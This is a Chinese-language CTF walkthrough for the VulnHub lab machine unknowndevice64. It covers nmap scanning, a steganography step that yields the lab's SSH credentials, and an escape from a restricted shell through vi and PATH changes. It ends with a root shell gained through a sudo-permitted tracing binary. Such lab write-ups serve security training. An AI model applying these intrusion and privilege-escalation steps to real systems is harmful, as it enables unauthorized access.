device靶机详解

靶机下载地址

https://www.vulnhub.com/entry/unknowndevice64-1,293/

靶机配置

主机发现

arp-scan -l

端口扫描

nmap -sV -A -T4 192.168.229.159
nmap -sS -Pn -A -p- -n 192.168.229.159

这段代码使用nmap工具对目标主机进行了端口扫描和服务探测。

-sS:使用SYN扫描方式进行端口扫描,它比默认的TCP扫描方式更快,因为它只发送SYN包而不发送其他数据包。

-Pn:禁用主机发现,即不发送ICMP Echo Request数据包来判断目标主机是否存活。

-A:启用操作系统探测、版本探测、脚本扫描和跟踪路由。

-p-:扫描所有65535个端口。

-n:不进行DNS解析,直接使用IP地址进行扫描。

192.168.229.159:目标主机的IP地址。

这段代码的目的是扫描目标主机开放的所有端口,并获取其操作系统类型、版本、服务等信息。

网页访问

http://192.168.229.159:31337/#

F12查看页面源码

发现隐藏目录key_is_h1dd3n.jpg

拼接访问

是个图片,猜测是个ctf隐写

http://192.168.229.159:31337/key_is_h1dd3n.jpg

下载图像,使用kali工具**steghid(开源隐写程序)**进行隐写!!!

steghide extract -sf key_is_h1dd3n.jpg

需要密码,猜测为h1ddsn,猜测成功

自动生成一个图片,复制到本机,使用在线工具https://copy.sh/brainfuck/,或者https://www.splitbrain.org/services/ook在线解密后即可获取到ssh的用户名和密码;

https://copy.sh/brainfuck/

账户:ud64

密码:1M!#64@ud

目录扫描

dirb "http://192.168.229.159:31337"

GETshell

ssh连接

ssh ud64@192.168.229.159 -p 1337

提权

连按两下TAB键,查看当前用户权限,及可以使用的命令:

发现vi和 export命令可以使用

export命令用于设置或显示环境变量,在shell中执行程序时,shell会提供一组环境变量,export可新增,修改或删除环境变量

1、在vi编辑器中,输入 :!/bin/bash

在vi命令行下输入!/bin/bash即可顺利进入bash

2、通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:

在vi命令行下输入!/bin/bash即可顺利进入bash
通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:
export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
export PATH=/bin:$PATH

使用sudo sysud64 -h查看帮助消息,发现可以使用

-o file        send trace output to FILE instead of stderr

尝试将root用户的shell导出到该用户下

sudo sysud64 -o /dev/null /bin/sh
id
whoami

提权成功

相关推荐
follycat1 小时前
[极客大挑战 2019]HTTP 1
网络·网络协议·http·网络安全
Lionhacker16 小时前
网络工程师这个行业可以一直干到退休吗?
网络·数据库·网络安全·黑客·黑客技术
centos0817 小时前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf
程序员小予20 小时前
如何成为一名黑客?小白必学的12个基本步骤
计算机网络·安全·网络安全
蜗牛学苑_武汉1 天前
Wazuh入侵检测系统的安装和基本使用
网络·网络安全
乐茵安全1 天前
linux基础
linux·运维·服务器·网络·安全·网络安全
如光照1 天前
Linux与Windows中的流量抓取工具:wireshark与tcpdump
linux·windows·测试工具·网络安全
follycat1 天前
2024强网杯Proxy
网络·学习·网络安全·go
黑色叉腰丶大魔王1 天前
《运维网络安全》
运维·网络·网络安全